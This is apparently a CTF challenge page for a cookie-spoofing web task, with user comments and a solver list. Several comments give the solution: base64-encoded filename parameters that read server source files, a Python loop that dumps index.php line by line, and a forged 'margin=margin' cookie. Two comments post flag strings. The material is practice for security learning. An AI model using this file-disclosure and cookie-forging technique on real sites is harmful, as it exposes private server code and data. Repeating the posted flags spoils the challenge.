cookiesWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 1金币
解  决: 5159
提  示:
描  述:
cookies欺骗
评论
Red_Dusk 13天前

火狐浏览器hackbar Url + /index.php?line=&filename=a2V5cy5waHA= cookies:margin=margin

回复 0

r0ok1e 1月前

import requests a=25 for i in range(a): url="xxxxx/index.php?line="+str(i)+"&filename=aW5kZXgucGhw==" s=requests.get(url) print(s.text) 跑出源码来就知道怎么做啦:)

回复 1

一路奔腾 4月前

url中只需要把文件名改成keys.php的64编码,然后在加上cookie发包,页面为空,f12查看flag

回复 2
菜鸡的小韩 1月前

大佬厉害

回复 1

zhaiye 6月前

for i in range(30): headers = { "user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36&q

回复 0

Anderlos 6月前

bp不行的可以试试yakit,比较简单的设置cookie

回复 0

xhanil 8月前

url/index.php?line=&filename=a2V5cy5waHA== margin=margin用hackbar亲测有效

回复 0

ikun604 8月前

编码,文件猜测,python脚本获取源代码,设置cookie

回复 0

weekit 8月前

flag{ce763cb4f9f5256380abe9ae5f63d087}

回复 0

tcsys 9月前

打开后302跳转,两个参数line和file,并且file是base64的keys.txt。通过file修改为aW5kZXgucGhw (index.php),通过line参数逐步遍历源码。再找到cookie和keys.php,同理列出flag。

回复 0

18905608864 11月前

flag{080e1ca9d838cf6dc00c3efb671b4156}

回复 0

WriteUp

image
harry

3 金币

评分(9)

解题动态

mmmmlp 攻破了该题 1天前
to5ny 攻破了该题 3天前
星辰零下 攻破了该题 3天前
cat1 攻破了该题 5天前
FUCK123 攻破了该题 5天前
player33 攻破了该题 5天前
向云端bugku 攻破了该题 8天前
YJ_hat 攻破了该题 8天前
xiuliyeer1 攻破了该题 8天前
mxqctf 攻破了该题 9天前
lilac 攻破了该题 10天前
zhang1985 攻破了该题 10天前
风临渊 攻破了该题 10天前
wctf111 攻破了该题 11天前
星落 攻破了该题 11天前
3599348780 攻破了该题 12天前
Red_Dusk 攻破了该题 13天前
Yb9msxx 攻破了该题 13天前
lizhi123456 攻破了该题 14天前
nlHaha 攻破了该题 14天前